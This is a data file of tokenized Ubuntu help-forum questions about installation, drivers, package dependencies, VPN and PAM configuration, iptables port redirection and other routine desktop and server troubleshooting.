301274	processes allotting excessive disk space to ( deleted ) .xsession-errors file	my root disk is full to the brim because of , i suspect , disk space locked up by a ballooning .xsession-errors file . the ballooning is caused by running processes that keep the error file open and dumping data into it , i.e. , pid from several different applications e.g. , chromium being the largest culprit . i suspect this is the case because lsof | grep deleted returns lines like : chromium- 27607 user 2w reg 8,1 1809493864448 108527952 /home/user/.xsession-errors ( deleted ) chromium- 27762 user 2w reg 8,1 1809493864448 108527952 /home/user/.xsession-errors ( deleted ) the twist here is that i have a cron job set to delete the file home/user/.xsession-errors` as per a suggested work around to this issue . you can imagine how this situation runs a mock quickly when chromium opens up umpteen processes ! i am using a 64bit ubuntu 12.04 machine with the following hd ( ext4 ) config : filesystem size used avail use % mounted on /dev/sda1 1.8t 34g 1.7t 2 % / udev 12g 4.0k 12g 1 % /dev tmpfs 4.8g 1.2m 4.8g 1 % /run none 5.0m 16k 5.0m 1 % /run/lock none 12g 2.1m 12g 1 % /run/shm /dev/sde1 1.8t 450g 1.3t 26 % /media/sea2t /dev/sdd1 2.7t 201m 2.6t 1 % /media/buff3t /dev/sdb 3.6t 118g 3.3t 4 % /media/indar /dev/sdc 3.6t 3.0t 469g 87 % /media/alaya what i 've done so far to resolve in vain : is it possible to reclaim this space ? apparently not in my case , though others have managed to truncate the file to free up the the disk . as this seems to be a sort of virtual occurrence , with no real file ( s ) as culprit , rebooting was the working option for me . how to ensure this does n't happen again ? i still do n't know . the current workaround is setting the errfile variable in the file /etc/x11/xsession to /tmp/ $ user-xsession-errors in order to figure out what is being dumped to this error file . i appreciate any suggestions as to how to deal with the run away xsession-errors file once and for all ! thanks in advance .
301276	problems running ubuntu from usb drive	i just bought new computer hardware and i wanted to install ubuntu fresh . i downloaded the latest 12.04 lts .iso file and created a bootable usb stick ( 4 gb ) . i then selected 'install ubuntu ' from the grub menu and proceeded to install ubuntu onto a different 32 gb flash drive . i partitioned the drive into 8 gb ext4 from / , 8 gb swap area , and the remainder on to ext4 /home . i did opt to select installing proprietary drivers . after what seemed like forever ( probably 3-4 hrs but i fell asleep ) the installation finally completed and i selected the 'restart now ' button the next morning when i woke up . in the bios , i then switched to the 32 gb stick as my primary boot device and i do n't get a grub menu upon startup , i get a single line error message like problem running operating system , but i ca n't remember the exact error message and i do n't have access to the computer at the moment . i do n't think the error message was `` missing operating system '' though . if i boot from the 4 gb flash drive i get the same thing as i got before before installing ( i get a menu option to install ubuntu ) . what did i do wrong ? is booting from usb stick a bad idea ? why did it take so long to install ? mainly looking for a fix to the problem .
301277	install pymc on amazon ec2	i want to use pymc on amazon ec2 . according to my package search the python-pymc package is only available under raring . however , ec2 seems to be shipped with precise and after running sudo apt-get dist-upgrade it seems to have remained precise . what can i do to install pymc ?
301279	mousekeys - moving by small or large increments	i 'm using mousekeys under lubuntu . i 'm wondering , is there a way to get the mouse to jump ? currently , when i hit 6 , the mouse goes a tiny bit to the right . is there a way ( by pressing shift+6 , for example ) to get the mouse to jump 20 pixels to the right instead ? the cursor goes fast enough , i 'm happy there , it 'd just be nice to have the option when needed to hit shift and have the cursor leap and it occurred to me that it might already be a feature i just have n't been able to find . thanks , -sage
301280	sudo maas-import-isos fails	i am unable to run sudo maas-import-isos . the error message i get is # # # failed to download md5sums for precise-x86_64 . failed to download md5sums for precise-i386 . failed to get https : //maas.ubuntu.com/images/query/precise/ephemeral/released-dl.current.txt remote query of https : //maas.ubuntu.com/images failed profile raring-i386 not found , inheritance not possible # # # however i do have access to the outside world since the curl function succeeds . can someone please help ? ?
301282	does ubuntu come with dictionary/list of words file ?	i was wondering if ubuntu comes with a file that lists all of the words in , say , the webster 's dictionary , for the purposes of spell checking and whatnot . i looked around a bit and i could n't find anything .
301285	how to set ipod tracks to remember playback position	i 've tried using banshee , amarok , and rhythmbox , and so far i 've been unable to set the `` remember playback position '' property of some files . in itunes this was done through the `` get info '' menu but i do n't see any way to do this in the aforementioned programs . how can i do this with ubuntu ?
301289	is it possible to run adobe dreamweaver on ubuntu 13.04 ?	is there any way you can run adobe dreamweaver , or other simlar adobe products such as photoshop , on ubuntu 13.04 ?
301292	new to ubuntu and looking to find a stand alone desktop crm ...	i have just joined the ubuntu community ( i was advised to stick with 12.04 lts ) . i own and operate my own business from home and i am looking for some type of crm download that is not web based . i am also not a code master ... .i just need to be able to keep up with tasks , assign tasks , chat , to do list , customer contact info and scheduling ect . i have been searching for the past cpl hours and have yet to find something close : ( i appreciate the help ! ! ~michelline~
301295	why are there updates pending after install , even when download updates during installation ?	if you are connected to internet during ubuntu ( or any of its variants ) installer , you have the option `` download updates while installing '' . but even if you check this option , there are updates pending when you boot on your fresh installed system . so my question is , what is the reasoning to decide which packages can be updated during installation and which packages can not ?
301299	ubuntu 13.04 bluetooth adapter identified but can not detect devices	alright , so a little back story before the question . i ordered an awesome controller a half a year back and have since awaited its arrival . well it arrived today and i was extremely excited.. until i tried to use it . the controller connects to devices via bluetooth and for the past two or three hours i 've done internet sweeps and google searches looking for and testing hopeful solutions to my problem : my bluetooth adapter is present , but it continually searches for devices never finding them . i 've experimented with various package installs following online instructions given that i 've only used ubuntu ( and linux in general ) for a little under a month . i tried installing blueman and other bluetooth packages in an effort to get the device to be detected . i also verified it was n't a hardware defect in the device itself . i took a bluetooth phone and paired the controller effortlessly . i also attempted to pair the phone with my computer , but it did n't work either with the same results : the computer can not detect the phone , nor can the phone detect the computer . i should note that i 've used bluetooth without issue with windows 7 , but that should n't matter , should it ? : p since reading so many plausible solutions gave me an idea of what might be asked of me i 'll include a few things here : lsusb bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 5986:0149 acer , inc bus 001 device 004 : id 148f:1000 ralink technology , corp . bus 001 device 005 : id 0bda:0159 realtek semiconductor corp. digital media card reader bus 002 device 003 : id 046d : c52f logitech , inc. wireless mouse m305 bus 002 device 004 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) 03:00.0 network controller : ralink corp. rt3090 wireless 802.11n 1t/1r pcie 7f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) 7f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) 7f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) 7f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) 7f:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) 7f:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) hcitool dev hci0 70 : f3:95:74:18 : b8 rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no here is some information about my bluetooth adapter . i recall reading something about trouble with devices that bundle bluetooth and wifi ... but i do n't know if it 's of any significance here . i also think it 's curious that i have two bluetooth devices showing up in the rfkill list command.. could that have something to do with the problem ? a quick recap of the problem : bluetooth adapter present searches for devices but none can be found is searched for ( visibility enabled ) but ca n't be found by other bluetooth devices i 'd love any help anyone could give me as i really do n't know my way around ubuntu very well yet . that and i 'd really like to test out the new controller . : p
301301	fix broken dependencies	i 'm trying to install tortoisehg but i get an error : $ sudo apt-get install tortoisehg reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : tortoisehg : depends : python-qt4 ( > = 4.7 ) but it is not going to be installed depends : python-qscintilla2 but it is not going to be installed e : broken packages how do i fix this ?
301302	how to remove ubuntu and put windows back on my computer ?	hi can anyone please tell me how to uninstall ubuntu 12.04 ? i have installed it via a live cd but now i want to uninstall ubuntu 12.04 .can anyone please tell me the steps ? i want my windows to be there . it should not go . sorry i forgot to mention that mine isnot dual booting system .
301305	activation/configuration of ttys0 - ttys3	i am an amateur radio operator and love digital radio communications . i need to get my com ports functional ( ttys0 , s1 , s2 and s3 ) . i have been searching for a way to activate/configure these ports . i have downloaded cute com and serial port terminal gtk term and added dialup to my group as well as root . i have been on this site looking for the correct method to get things going . i intend to use fldigi ( with rig control ) and mini com for packet operations . if i can get wine to work , ham radio deluxe , multipsk among others will be forthcoming . from windows the port settings were 8 , n,1 at 9600 no hardware or software control . i would prefer to not use the terminal but as long as i get things going that is fine .
301308	any application open causes a new tab in ubuntu 12.10	i am a new bee who moved from windows to ubuntu & i am loving it ... since from a week , whenever i open any application like eclipse , zimbra desktop , a new blank tab will be automatically opens in the default web browser . i am unable to trace where my ubuntu is going wrong ... any help will be appreciated ... thank you ...
301319	how to fix messed up gui when installing ubuntu 13.04	i tried downloading the 32 bit version of ubuntu 13.04 , and when it finished , i used the universal usb installer tool , provided on the ubuntu website . that was all successful , but when i tried to boot it , the gui was completely messed up . it loaded the system itself , but once it went into the desktop with the dialog prompting for a language for installation , the screen went whacko . every other horizontal line of pixels was messed up , and it had columns ( kind of ) that repeated what the screen should look like , but only a small region of it . my processor is amd 64 bit , so i tried again with the 64 bit version of ubuntu , but the exact same thing happened . ( by the way , i have slow internet , so each download took about 4-5 hours , along with several failed downloads . ) i tried the same thing using a different usb mounting software , but the same gui issue happened . each time i retried , i completely wiped and re-formatted the usb disk . nothing is working . what should i do ? should i download the windows installer ? use a cd ? please help ! any feedback is appreciated .
301325	ubuntu usb wont save my setting on reboot despite my 2gb persistent partition	ive install ubuntu 13.0.4 onto a new 8gb usb drive with the windows universal installer . i told it to format the drive and leave a 2gb persistent space . it all seemed to work . on boot i select try ubuntu form usb . it boots everything is fine . when i reboot however it does n't save and changes i make . this is very frustrating ive reinstalled 10 times and ive tried 3 different usb sticks . ive also tried using the ubuntu startup disk installer app running from the usb version of ubuntu . nothing works . i dont want to have to go out and buy a damn hard drive because the project im trying to set up does n't need one .
301326	how to : install proteus from humble indie bundle depends : proteus ( = 1.1-0ubuntu3 )	after redeeming my software center key to download proteus from the new humble indie bundle # 8 , this error appears : proteus-meta : depends : proteus ( = 1.1-0ubuntu3 ) but 1.1-0ubuntu2 is to be installed i have tried : -purging a few questionable repositories ( pulseaudiodev , markjtully , xorg-edgers , nae-team ) sudo apt-get install -f sudo apt-get purge 1.1-0ubuntu2 sudo apt-get install 1.1-0ubuntu3 -- update 05/28/13 -- it now seems that the real culprit is `` libdgiplus , '' which i can not figure out how to install from here : https : //launchpad.net/ubuntu/+source/libgdiplus/2.10-3ubuntu1 running `` sudo dpkg -i *.deb '' in a folder only containing the proteus .deb file returns : selecting previously unselected package proteus . ( reading database ... 343081 files and directories currently installed . ) unpacking proteus ( from proteus_1.1-0ubuntu3_i386.deb ) ... dpkg : dependency problems prevent configuration of proteus : proteus depends on libgdiplus ; however : package libgdiplus is not installed . dpkg : error processing proteus ( -- install ) : dependency problems - leaving unconfigured processing triggers for hicolor-icon-theme ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... errors were encountered while processing : proteus
301330	linux 13.04 wired connection not automatically on	there is a direct lan on my thinkcenter lenovo . at certain occasions it disconnects . not all the time but mostly after a restart . it is simple to restart via : system settings > network > wired ... always works . there were no special drivers required during the initial installation . is there a way to force a wired reconnect after a boot ? the lan card is a broadcom corporation netxtreme bcm5755 gigabit ethernet pci express ( rev 02 ) and linux 13.04 tia jim
301336	unable to play dvds ubuntu 12.04	after installing recommended libraries i am still unable to play any dvd . i am able to play cds just fine but when i insert a dvd , i get this error : `` unable to mount ( dvd name ) error creating moint point : no such file or directory . '' if i manually mount my cdrom with sudo mount /dev/sr0 /cdrom i can access the video_ts file but am still unable to actually play the dvd itself . sudo lshw output : *-scsi:2 physical id : 3 logical name : scsi2 capabilities : emulated *-cdrom description : dvd-ram writer product : dvdram gh24ns90 vendor : hl-dt-st physical id : 0.0.0 bus info : scsi @ 2:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : in01 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=ready *-medium physical id : 0 logical name : /dev/cdrom
301337	how do i add missing cities for the other locations on the time & date clock ?	i want to add 'amsterdam ' and 'san francisco ' to my `` time in other locations '' setting on the clock , but those cities seem to be missing . what is wrong ? how do i add them ? i 'm using ubuntu 12.04 lts .
301351	dell xps 15z ( l511z ) - ubuntu 13.04 - short battery life ... any help , ideas , or mods ?	i presently have a dell xps 15z ( l511z ) ( + 240gb sandisk extreme ssd upgrade ) . i also have ubuntu gnome 13.04 installed . my bios is at the latest version . i have the following power-related packages installed : bumblebee , pm-utils , acpi , acpi-call-tools , powernap , powerwake , smartdimmer , and tlp i use the following boot commands : acpi_backlight=vendor dell_laptop.backlight=0 pcie_aspm=force i915.i915_enable_rc6=1 i915.i915_enable_fbc=1 drm.vblankoffdelay=1 vt.handoff=7 quiet splash acpi_osi=linux i am only getting 2.5 hours of battery life now . it 's horrible . i was getting 4-6 hours of battery life when i had ubuntu 12.04 with bumblebee and laptop-mode-tools installed . my laptop should be getting 5 hours of battery life on average . i can get that in windows 8 x64 with high-performance mode turned on for the battery mode . why ca n't i get that on ubuntu any more ? i used to be able to , prior to ubuntu 12.10 . i need help . i have tried as much research as i could find , no luck . does anyone know how i can get at least 4 hours of battery , without throttling my cpu or dimming my display more than reasonable ? suggestions ?
301353	connecting through remmina to x11vnc server	this puzzles me : i 'm trying to connect through remmina remote desktop client to a x11vnc is a remote desktop server . both computers are running linux , are online through a standard home dsl connection and have no fancy firewalls running . settings in remmina : when i connect the server laptop to the same dsl box as the client it connects without a problem . if i try to connect over the internet - after adjusting the i.p . number i get `` unable to connect to vnc server '' . how can i connect ? details : vnc client - remmina on ubuntu 12.10 . vnc server - x11vnc on puppy linux wary ( see http : //www.murga-linux.com/puppy/viewtopic.php ? t=27424 with x11vnc_server-0.9.4b.pet )
301361	when will we see ubuntu smartphones in shops and/or on ebay ?	will we see ubuntu smartphones in shops and/or on ebay ?
301362	ca n't switch between console mode and gui	i 'm new to linux/ubuntu and experiencing the following problem : i start my computer , and get to the gui where i can login . when i click ctrl+alt+f1 i will get to the first of the consoles , everything is fine so far . but now i ca n't switch back to the gui . when i press ctrl+alt+f7 or only alt+f7 ( i have tried both ) , the screen goes completely black and there is nothing i can do . ctrl+alt+f1 or alt+f1 will not bring me back to the console , neither does any other ctrl+alt+f # or alt+f # combination . sometimes ( and i 'm not sure what it depends on whether it works or not ) i can switch back to the gui once . but if i then go to the console again and try to go back to the gui a third time , it never works . i am using ubuntu 12.04 lts 32-bit on a very old ( 7 years ) fujitsu siemens laptop ( intel pentium ( r ) m processor 2.00 ghz ; 1gb memory ) . could it be a hardware problem ? thanks a lot in advance for any help !
301364	terminator : window flickers when hit < tab > in screen	i have been using terminator since few days and i m facing an annoying issue . whenever i hit tab ( in screen ) , window flickers ( becomes black for a micro second and turns normal again ) . i googled it and found few solutions . one of them being adding force_no_bell = true to its config file . added it but still of no use . when i am not in screen , it does n't flick though . it happens only in screen . other than that , its awesome : ) i am using terminator 0.97 on gnome-shell 3.8 on ubuntu 13.04 please help thanks
301367	what is managing ssh keys in unity , and how do i reset / disable / configure it ?	i 'm using ubuntu 13.04 , and recently changed my ssh keys . for some reason unity , or something in gnome ( seahorse ? ) does n't seem to be recognizing it . the keys were generated on a different machine , and i basically copied the new ssh key pair to /home/user/.ssh something broke after i copied the new keys over . when i run git clone < url > in a terminal in unity , i get this error : agent admitted failure to sign using the key permission denied ( publickey ) . fatal : could not read from remote repository please make sure you have the correct access rights and the repository exists by chance , i switched to a tty console and ran the same git clone < url > command . it actually works ! is something in unity is somehow managing the ssh keys , and somehow it is n't using the key pair in the /home/user/.ssh directory ? after some googling , i 've tried running ssh-add but it does n't work . i 've also tried moving everything out of the /home/user/.local/share/keyrings directory then rebooting , but i 'm still getting the same error in the terminal session in unity . what could be the issue here ?
301370	seeking system architecture advice for ubuntu server home server and openelec media center	this question isnt about an urgent technical problem , rather im seeking a discussion about system architecture with the hope of gaining some insight from those more experienced than me on the subject . i joined the world of linux a year ago , finally giving windows the finger , running ubuntu 12.04 on my laptop . a month ago i set up a home server running ubuntu server 12.04 headless . the primary purpose is for serving media ( samba server ) but i am also running a torrent and web server on it amongst other things . it doesnt run 24-7 , just when its needed . the server is connected to the home wireless network . i also installed openelec ( lightweight linux distro for xbmc ) on a raspberrypi which serves as the media center for the living room tv . the pi contains no media at all and is connected to the home server via ethernet , sharing the home servers internet/wlan connection through static routes and some ufw rules . the ethernet connection direct from the server ensures fast streaming of hd videos etc to the pi . since the home server sits right next to the tv anyway , would it be better/more efficient to run the media center on ubuntu server in a virtualbox vm ? the home server has a decent graphics card that is going to waste ( headless ) and this method would mean openelec is only running while the server is switched on , the rest of the time , its useless anyway . which way is more energy efficient ? moving the media centre to a vm on ubuntu server would mean only 1 machine is running but the pi uses very little power and the server load would increase running a vm . also would this setup improve the media centers internet/home network connection , which doesnt seem to be great at the moment ? an alternative architecture is installing vmware esxi and running ubuntu server and openelec as 2 different vms with access to the disc drive partition that contains all of the media . at work im currently moving some of our customers systems to the esxi architecture and it seems nice and efficient and minimal but it seems to have a long boot time ( at least the free version does ) which means i would lose ubuntu 's ridiculously quick boot time . as its not running 24-7 maybe the power of esxi is only realised on a commercial scale and isnt suitable for a home setup ? look forward to your response . cheers , clive
301371	how to recover file and folder permission ?	i made this mistake at the /usr directory sudo chmod -r 777 bin the next time i used sudo , it gives me this prompt : sudo must be setuid root what i did is copy and replaced this sudo thinking it would recover its default permission . now the sudo command prompts this : bash : /usr/bin/sudo : permission denied help . i cant change the permission of sudo already . pexec did nothing as well .
301373	display settings fail to apply on 13.04 with gnome 3.6/3.8	when running the display settings ( gnome-control-center display ) under gnome 3.6 on ubuntu 13.04 i 'm unable to apply any settings ( even if nothing changes ) . the error i get is : failed to apply configuration : % s gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.settingsdaemon was not provided by any .service files . background : i 've tried to use the newer 3.8 release from the ppa 's but that did n't help , i 've now reverted to the 3.6 release . i 've also tried removing all my gnome related config files , but that did n't make a difference . the error message :
301377	unable to locate grizzly packages in ubuntu 13.04 server	i have installed ubuntu 13.04 server in my x86 based laptop and then added the desktop packages on top of it . i have downloaded all the packages using apt-get . i have mysql , postgresql , python 3.3 , etc . but i am unable to locate grizzly-specific nova , swift , and glance packages ( openstack ) . i am using this command : dpkg -l | grep nova dpkg -l | grep glance etc . is n't ubuntu 13.04 server supposed to come with grizzly automatically ?
301380	how to use google authenticator with openvpn server on ubuntu 12.04	i have a working openvpn system on ubuntu 12.04 and i 'd like to add google authenticator for extra security . this is my current openvpn config : dev tun proto udp port 1096 ca ubuserv04-ca.crt cert ubuserv04.crt key ubuserv04.key dh dh1024.pem server 10.10.0.0 255.255.255.0 push `` redirect-gateway def1 '' push `` route 192.168.0.0 255.255.255.0 '' push `` dhcp-option dns 8.8.8.8 '' push `` dhcp-option dns 8.8.4.4 '' float log-append /var/log/openvpn-otp-1096-status.log ( this is just a test setup , i know i should change certain aspects of it but this works for now . ) on the client i have : dev tun client proto udp remote my.server.fqdn 1096 resolv-retry infinite ca ubuserv04-ca.crt cert user1.crt key user1.key verb 3 the above setup works fine : no errors , fast , stable . i 've tried several howtos to get google authenticator running but i end up troubleshooting side problems in those articles every time . i do n't want to authenticate against the server 's local user/password database , just the system i already have in place plus google authenticator . i have google authenticator running ; i installed it using apt-get install libpam-google-authenticator and have used it before to authenticate ssh sessions . that worked fine but i have now disabled that because it 's just a test server and that particular test was finished . please be specific . i know i should add a plugin to my server 's ovpn config and that i should add something to /etc/pam.d/openvpn but what exactly ? any help would be greatly appreciated ! /extra info i 've followed this article : http : //www.howtoforge.com/securing-openvpn-with-a-one-time-password-otp-on-ubuntu instead of compiling from the source i 've installed google authenticator with apt-get install libpam-google-authenticator . i 've also read , but not used in this case , these articles : http : //www.howtogeek.com/121650/how-to-secure-ssh-with-google-authenticators-two-factor-authentication/ and http : //zcentric.com/2012/10/09/google-authenticator-with-openvpn-for-2-factor-auth/ . and i 've read up on pam , as suggested ; ) now , here are some interesting developmens . /etc/pam.d/openvpn has this : account [ success=2 new_authtok_reqd=done default=ignore ] pam_unix.so account [ success=1 new_authtok_reqd=done default=ignore ] pam_winbind.so account requisite pam_deny.so account required pam_permit.so auth required pam_google_authenticator.so as per the howto i copied the original from /etc/pam.d/common-account and added the last line . now if i comment the last line out , the openvpn connection succeeds . if the last line is not commented out however , /var/log/auth.log logs this : pam unable to dlopen ( pam_google_authenticator.so ) : /lib/security/pam_google_authenticator.so : undefined symbol : pam_get_item pam adding faulty module : pam_google_authenticator.so and /var/log/openvpn-otp-1096.log logs this : plugin_call : plugin function plugin_auth_user_pass_verify failed with status 1 : /usr/lib/openvpn/openvpn-auth-pam.so tls auth error : auth username/password verification failed for peer e-using ssl/tls context auth-pam : background : user 'martin ' failed to authenticate : module is unknown the problem seems to be between pam and google authenticator . google lists problems with other plugins but i ca n't really find information regarding google authenticator specifically .
301383	is there a ubuntu in other languages ( for example russian ) ?	i would really like to move to ubuntu and transfer all my gadgets ( desktops , laptops , smartphones , etc . ) to this wonderful operating system , but only one thing stops me - support of the russian language , as i am not a single user of all these devices . in my family six people , only two of them ( including me ) know english , respectively . the other four people have no knowledge of the english language .
301385	setting up scanning with konica minolta bizhub 350	i 'm trying to get a konica minolta bizhub 350 network printer to send scanned documents to a desktop station . i 've been trying to achieve this through smb but with no luck , i 'm not exactly sure what my setup should be to achieve this . my smb shared folder picks up on the network and can be viewed by windows based work stations but for some reason it can not send scanned documents to that folder from the printer . any advice will be greatly appreciated in helping me resolve this issue .
301393	how to allow guest session to access printers and scanners ?	i want to allow the guest session to access printers and scanners . i use ubuntu 12.04 .
301395	how do i fix this error when building octave ?	i 'm using ubuntu 13.04 gnome edition . i 'm trying to compile octave 3.6.4 using the source . the configure went smooth without any errors but the make command returned me following errors : collect2 : error : ld returned 1 exit status make [ 3 ] : *** [ octave ] error 1 make [ 3 ] : leaving directory `/home/ankit/softwares/octave-3.6.4/src' make [ 2 ] : *** [ all ] error 2 make [ 2 ] : leaving directory `/home/ankit/softwares/octave-3.6.4/src' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/ankit/softwares/octave-3.6.4' make : *** [ all ] error 2 what more do i require to post to get the problem sorted ?
301396	dual boot problem in lenovo g580 ( 20157 ) model	two days before i have got this model lenovo g580 ( 20157 ) with i5 processor and nvidia 610m graphic card ... i want to install ubuntu and windows 7 or windows 8 in dual boot ... what i have done to do this : 1.installed windows 8 with no problem and it was working completely fine 2.i restarted my laptop and inserted ubuntu 12.04 64 bit cd 3.ubuntu installation setup started and in that it was showing that there is no operating system preinstalled on this machine ... ... .it was showing that my complete hard drive is blank ... ... but when i removed my ubuntu cd without installing it and restarted the computer windows 8 was working fine ... i have tried with ubuntu 12.04 332 bit and with linux mint 14 64 bit also but the same scenario occured the problem which i am facing is because of uefi technology which started coming in recent laptop's please help me ..it is a serious problem for me as ... ... ..even though wubi also do not work ... ..
301397	ubuntu 13.04 - i 'm not able to use vertical worskpaces	i 'm experiencing this strange bug . basically , if i enable the workspaces in ubuntu 13.04 i see them , and i can go into different workspace by pressing super+s and double clicking on them , but i am somehow inhibited to navigate into them with the keyboard ( the typical ctrl+alt+arrow ) . more strangely , this happens only for vertical workspaces , and i 'm still able to navigate into horizontal workspaces . obviously , i 'm not experiencing this on my other 12.04 partition , so it 's definitely not an hardware failure of some sort . any help ?
301398	bsnl 3g data card is installed in ubuntu 12.04 , but not opening	i have ubuntu 12.04 installed in my laptop . bsnl 3g data card software installed , but not opening . what are the possible problems .
301400	change udp port with iptables for vpn clients	what i want to do is say that for all udp connections on interface ppp0 that have a destination port of 53 , change that destination port to 1053 . i am attempting to change the destination port of udp packets for vpn clients connected via pptp on ubuntu . this question : http : //stackoverflow.com/questions/242772/using-iptables-to-change-a-destination-port suggests that this can be done using nat at the -- to-destination option , for example : iptables -t nat -a output -p udp -- dport 53 -j dnat -- to-destination x.x.x.x:1053 this does work but it changes the port for all packets going out on port 53 but i only want to chane the port for some of my vpn clients who are connected on interface ppp0-255 and ip range 192.168.0.10-255 . i have tried adding the source into the statement , for example : iptables -t nat -a output -s 192.168.0.10 -p udp -- dport 53 -j dnat -- to-destination x.x.x.x:1053 this however does not appear to work and the vpn connections still go through to port 53 . any ideas ?
301403	grub2 usb command return empty list	i have a brand new hp probook 4540s , installed windows8 then ubuntu 13.04 so grub2 is installed to my hdd successfully each of the oss loads correctly . now i 'm trying a small experiment the goal is make grub boot the os after finding a usb stick with a certain serial number . checked grub2 command list and found `` usb '' which should list all usb devices i have . so i started my laptop , pressed `` c '' to enter grub command line , executed `` usb '' while having a usb flash stick connected but the command always return empty list like it can not find any usb devices , note the i tried the following and the result is the same : tried all usb ports tried `` insmod usb '' , `` insmod usbtest '' any ideas to reach this goal ?
301405	ubuntu splash screen customization	i wanted to know how to customize the splash screen in ubuntu 13 . i have tried to install plymouth manager but when i run sudo apt-get update it says it was unable to fetch http : //ppa.launchpad.net/mefrio-g/plymouthmanager/ubuntu/dists/raring/main/binary-i386/packages . i opened the address in firefox but it did n't open . also i would like to know where the files for the ubuntu logo , splash screen background , etc . are located ( to customize them ) . in previous versions they were located at usr/share/images . i am running ubuntu 13 raring ringtail on vmware player . the host is an acer 5600u running windows 8 . thnx .
301414	13.04 sudo reboot now is not working instead ends up in run level 1	hi after a recent update to packages on to 13.04 ( i.e . this has recently manifested ) i now have 5 different systems which will all fail to reboot using sudo reboot now this will result in them being stuck in single user mode , and since sshd will be down at this runlevel i have to physically ctrl-alt-del them down .
301417	how to recreate ephemeral disks ?	i 've deleted /var/lib/nova/instances/_base/ephemeral* . now i ca n't launch instance with them : 2013-05-29 10:28:11 1313 trace nova.compute.manager [ instance : 00a23134-8d1b-4f58-9a51-5110d201ade5 ] stderr : `` qemu-img : could not open '/var/lib/nova/instances/_base/ephemeral_0_20_none ' : no such file or directory\n '' how can i recreate/recovery ephemeral disks ?
301418	chef server version for ubuntu 12.04 , 32 bit	where can i get chef-server version for ubuntu 12.04 , 32 bit . this link provided does not have it for 32 bit os , http : //www.opscode.com/chef/install/ plz help
301424	high cpu temperature when using gnome	i have asus extensa 4220 laptop.if i install kubuntu ( any kde-based ) , then the cpu temperature looks normal for a long time ( now it is 74 degree celsius ) . but when i install gnome-based distros , then the temperature after some minutes of work rises to 90 degrees celsius , and my laptop shuts down to prevent damages . why is there such a big difference with cpu temperature between kde and gnome ? also when i used windows 8 , the cpu temperatures there were normal ( higher than on kde , and not as high as on gnome . just for information . )
301428	enabling multi-touch on a non-multi-touch touchpad	i have ubuntu 13.04 on my hp pavilion g4-1025tx , which i do n't think has multi-touch ( it did n't have multi-touch when i was on the bundled windows 7 ) . is it possible to enable multi-touch for this machine on ubuntu ?
301429	unable to mount hdd	i 'm unable to restart windows , it throws up an error . so i got to use ubuntu and yet i am unable to mount the volume . it throws up the following error : error mounting /dev/sda3 at /media/ubuntu/os : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' `` /media/ubuntu/os '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted . the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . please help !
301432	ubuntu 13.04 opens disks and directories in the browser instead of in nautilus	for example , when i plug in my external hard drive , google-chrome opens file : ///media/atj/toshiba % 20ext/ when in sublime text open containing folder opens the folder in the browser too . any clue to how i could get to the bottom of this ? i have tried looking into /usr/share/applications/defaults.list but inode/directory is assigned to nautilus-file-handler.desktop like it should be . so i am really clueless
